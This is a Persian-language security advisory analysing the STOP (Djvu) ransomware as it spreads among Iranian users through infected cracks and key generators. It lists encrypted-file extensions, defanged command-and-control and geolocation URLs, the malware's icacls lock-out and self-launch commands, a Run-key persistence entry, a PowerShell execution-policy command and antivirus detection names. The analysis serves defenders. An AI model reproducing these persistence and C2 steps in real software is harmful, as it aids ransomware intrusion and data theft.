کاربران ایرانی، هدف گسترده باج‌افزار STOP

در روزهای اخیر گزارش‌های متعددی در خصوص مشاهده آلودگی بر روی سیستم برخی کاربران ایرانی به نسخه‌های جدید باج‌افزار STOP به شرکت مهندسی شبکه گستر واصل شده است.

باج‌افزار STOP که نخستین نسخه آن در آذر 1397 شناسایی شد از روش‌های مختلفی برای آلوده کردن سیستم‌ها بهره می‌گیرد. در یکی از این روش‌ها، گردانندگان STOP با تزریق کد مخرب به برخی برنامه‌های موسوم به Crack،وKey Generator و Activator و به‌اشتراک‌گذاری آنها در سطح اینترنت دستگاه کاربرانی را که اقدام به دریافت و اجرای این برنامه‌ها می‌کنند به باج‌افزار آلوده می‌سازند. متأسفانه این شیوه، اصلی‌ترین دلیل انتشار موفق STOP در سطح کشور است. به‌خصوص آنکه در زمان اجرای چنین برنامه‌هایی بسیاری از کاربران اقدام به غیرفعال کردن موقت ضدویروس خود کرده و همین مدت کم، برای اجرا شدن باج‌افزار و شروع فرایند رمزگذاری کافی خواهد بود.

به گزارش شرکت مهندسی شبکه گستر، STOP از جمله باج‌افزارهایی است که در هر یک از نسخه‌های خود، پسوندی متفاوت از نسخه قبلی به فایل‌های رمزگذاری شده الصاق می‌کند. فهرست پسوندهای بکار گرفته شده توسط این باج‌افزار به شرح زیر است:

.STOP, .SUSPENDED, .WAITING, .PAUSA, .CONTACTUS, .DATASTOP, .STOPDATA, .KEYPASS, .WHY, .SAVEfiles, .DATAWAIT, .INFOWAIT, .puma, .pumax, .pumas, .shadow, .djvu, .djvuu, .udjvu, .djvuq, .uudjvu, .djvus, .djvur, .djvut .pdff, .tro, .tfude, .tfudeq, .tfudet, .rumba, .adobe, .adobee, .blower, .promos, .promoz, .promock, .promoks, .promorad,, promorad2, .kroput, .kroput1, .charck, .pulsar1, .klope, .kropun, .charcl, .doples, .luces, .luceq, .chech, .proden, .drume, .tronas, .trosak, .grovas, .grovat, .roland, .refols, .raldug, .etols, .guvara, .browec, .norvas, .moresa, .verasto, .hrosas, .kiratos, .todarius, .hofos, .roldat, .dutan, .sarut, .fedasot, .forasom, .berost, .fordan, .codnat, .codnat1, .bufas, .dotmap, .radman, .ferosas, .rectot, .skymap, .mogera, .rezuc, .stone, .redmat, .lanset, .davda, .poret, .pidon, .heroset, .myskle, .boston, .muslat, .gerosan, .vesad, .horon, .neras, .truke, .dalle, .lotep, .nusar, .litar, .besub, .cezor, .lokas, .godes, .budak, .vusad, .herad, .berosuce, .gehad, .gusau, .madek, .tocue, .darus, .lapoi, .todar, .dodoc, .bopador, .novasof, .ntuseg, .ndarod, .access, .format, .nelasod, .mogranos, .cosakos, .nvetud, .lotej, .kovasoh, .prandel, .zatrov, .masok, .brusaf, .londec, .krusop, .mtogas, .nasoh, .nacro, .pedro, .nuksus, .vesrato. .masodas, .stare, .cetori, .carote, .coharos, .shariz, .gero, .hese, .xoza, .seto, .peta, .moka, .meds, .kvag, .domn, .karl, .nesa, .boot, .noos, .kuub, .reco, .bora, .leto, .nols, .werd, .coot, .derp, .nakw, .meka, .toec, .mosk, .lokf, .peet, .grod, .mbed, .kodg, .zobm, .rote, .msop, .hets, .righ, .gesd, .merl, .mkos, .nbes, .piny, .redl, .nosu, .kodc, .reha, .topi

در نسخه‌های نخست این باج‌افزار در صورت عدم اتصال دستگاه آلوده شده به اینترنت، باج افزار با مکانیزمی اقدام به رمزگذاری فایل‌ها می‌کرد که در برخی موارد امکان بازگردانی آنها بدون نیاز به پرداخت باج امکان پذیر می بود. در مهر ماه 1398 نیز شرکت ام‌سی‌سافت با مشارکت یک محقق امنیتی موفق به ساخت ابزاری شد که امکان رمزگشایی 148 گونه از باج‌افزار مخرب STOP را فراهم می‌کند. اما در نسخه های اخیر این باج‌افزار باگ‌ها و اشکالات مذکور برطرف شده است. گر چه امتحان کردن ابزار ام‌سی‌سافت به تمامی قربانیان STOP توصیه می‌شود.

STOP کشوری که دستگاه در آن قرار دارد را شناسایی و در صورت تطابق آن با هر یک از کشورهای نمایش داده شده در تصویر زیر اجرای خود را متوقف می‌کند.

بر خلاف روال معمول باج‌افزارهای هم‌قطار شناسایی کشور نه از طریق بررسی پوسته صفحه‌کلید (Keyboard Layout) که با مراجعه به نشانی https[:]//api.2ip.ua/geo.json صورت می‌پذیرد. در تصویر زیر نمونه‌ای از پاسخ ارسالی از سوی نشانی مذکور نمایش داده شده است.

در صورتی که کشور شناسایی شده در فهرست درج شده در کد STOP نباشد پوشه‌ای که نام آن برگرفته شده از شناسه UUID یا GUID است در مسیر زیر ایجاد شده و در ادامه فایل مخرب در آن کپی می‌شود.

%AppData%\Local\

در ادامه با استفاده از فرمان icacls فهرست کنترل دسترسی آن تغییر داده می‌شود:

“icacls \”%AppData%\\Local\\{UuId}\” /deny *S-1-1-0:(OI)(CI)(DE,DC)”

سپس از طریق فرمان زیر خود را اجرا می‌کند:

<Directory Path>\ewrewexcf.exe –Admin IsNotAutoStart IsNotTask

پارامترهای مذکور تعیین می‌کنند که پروسه از طریق برنامه‌های موسوم به Autostart یا فرامین زمانبندی‌شده (Scheduled Task) فراخوانی نشده و اجرای آن با سطح دسترسی اعلا صورت صورت گرفته است.

با اجرای این پروسه با استفاده از TaskSchedulerCOM فرمان‌زمانبندی شده‌ای در مسیر زیر ایجاد می‌شود.

C:\Windows\System32\Tasks\Time Trigger Task

نشانی MAC سیستم نیز با استفاده از فرمان ()GetAdaptersInfo استخراج می‌شود. درهم‌ساز MD5 این نشانی MAC با استفاده از توابع Windows Crypto API محاسبه شده و به‌عنوان شناسه انحصاری دستگاه در نظر گرفته می‌شود. در ادامه یک درخواست در قالب زیر به سرور فرماندهی (Command and Control) ارسال شده و در پاسخ یک کلید رمزگذاری عمومی مبتنی بر RSA-2048 دریافت می‌شود.

http://ring2[.]ug/As73yhsyU34578hxxx/SDf565g/get.php?pid={Mac Address_MD5}&first=true

پاسخ دریافت شده در فایل bowsakkdestx.txt در مسیر زیر ذخیره می‌شود:

%AppData%\Local

 از کلید مذکور در ادامه برای رمزگذاری استفاده می‌شود. در جریان این ارتباط شناسه دریافت شده به همراه کلید عمومی در فایل PersonalID.txt در مسیر C:\SystemID برای استفاده‌های آتی ذخیره می‌شود.

در صورتی که باج افزار قادر به برقراری ارتباط با سرور فرماندهی خود نباشد وجود فایل bowsakkdestx.txt در مسیر AppData%/Local% را مورد بررسی قرار داده و کلید واژه Public Key را در آن جستجو می‌کند. چنانچه فایل فاقد کلید عمومی باشد STOP فایل را حذف کرده و مجدد برای دریافت پاسخ از سمت سرور فرماندهی اقدام می‌کند. اما اگر فایل وجود نداشت از کلید عمومی و شناسه‌ایی که در کد باج‌افزار درج شده استفاده می‌کند. اکثر رشته‌های درج شده در کد با استفاده از روش‌های XOR و با کلیدهایی نظیر 0x80 رمزگذاری شده‌اند.

STOP برای ماندگار کردن خود بر روی دستگاه قربانی اقدام به ایجاد کلید زیر در محضرخانه (Registry) سیستم عامل می‌کند:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “SysHelper” = “%AppData%\Local\{UuId}\34efcdsax.exe” –AutoStart

باج‌افزار فایل موسوم به اطلاعیه باج‌گیری (Ransom Note) را در هر پوشه‌ای که حداقل یکی از فایل های آن رمزگذاری شده کپی می‌کند. نمونه‌ای از این اطلاعیه در تصویر زیر قابل مشاهده است.

STOP از رمزگذاری فایل های با هر یک از پسوندهای زیر خودداری می‌کند:

• .sys
• .ini
• .dll
• .blf
• .bat
• .lnk
• .regtrans-ms

همچنین از رمزگذاری فایل‌های زیر صرف‌نظر می‌شود:

• ntuser.dat
• ntuser.dat.LOG1
• ntuser.dat.LOG2
• ntuser.pol 
• _readme.txt

زیرپوشه‌های درون پوشه‌های Windows و Program Files نیز از رمزگذاری شدن مستثنی شده‌اند.

STOP،و5 بایت ابتدایی فایل را دست‌نخورده رها کرده و باقی آن را با الگوریتم Salsa20 و کلید عمومی مبتنی بر RSA-2048 رمزگذاری می‌کند.

در نمونه‌های اخیر، STOP اقدام به دریافت بدافزارهایی دیگر از سرور فرماندهی خود می‌کند. از جمله این بدافزارها، Vidar است که اطلاعات زیر را از روی سیستم قربانی جمع آوری و آنها را به سرور فرماندهی ارسال می‌کند:

• داده‌های اصالت‌سنجی مرورگر، سوابق و کوکی‌ها
• کاشه مرورگر
• اطلاعات سیستم
• داده‌های نرم‌افزارهای پیام‌رسان و مدیریت‌کننده ایمیل
• داده‌های نرم‌افزارهای اصالت‌سنجی دو عاملی

یا می‌توان به بدافزاری مشابه با Vilsel اشاره کرد که STOP آن را با استفاده از پروسه معتبر PowerShell و در قالب زیر اجرا می‌کند:

powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned

برای مثال در تصویر زیر m5.exeیکی از فایل‌های Vidar و updatewin1.exe از فایل‌های Vilsel است.

همچون همیشه بکارگیری روش‌های پیشگیرانه در مقابله با باج‌افزارها و مقاوم سازی پودمان RDP برای ایمن ماندن از گزند باج‌افزارها توصیه می‌شود.

همچنین نمونه‌های اخیر STOP با نام‌های زیر قابل شناسایی است:

Bitdefender

• Trojan.GenericKD.42095141
• Trojan.GenericKD.41974832
• Trojan.GenericKD.31534187
• Trojan.GenericKD.32681723
  Trojan.GenericKD.42311675
  Trojan.GenericKD.41329669
  Trojan.GenericKDZ.62418
• Trojan.AgentWDCR.SUF
• Gen:Variant.Trojan.Crypt.63
• Gen:Variant.Midie.68497

McAfee

• GenericRXJH-CM!74A9A6443076
• GenericRXJA-ZM!B0A89E143BAB
  GenericRXJO-OE!44E10B64BE30
  Trojan-FRQV!290E97907E5B
  Sodinokibi!4E8F1415DD33
  RDN/Generic PWS.y
• RDN/Generic PUP.z
  RDN/Generic.hra
• Generic.bto

Sophos

• Mal/Generic-S
• Mal/GandCrab-G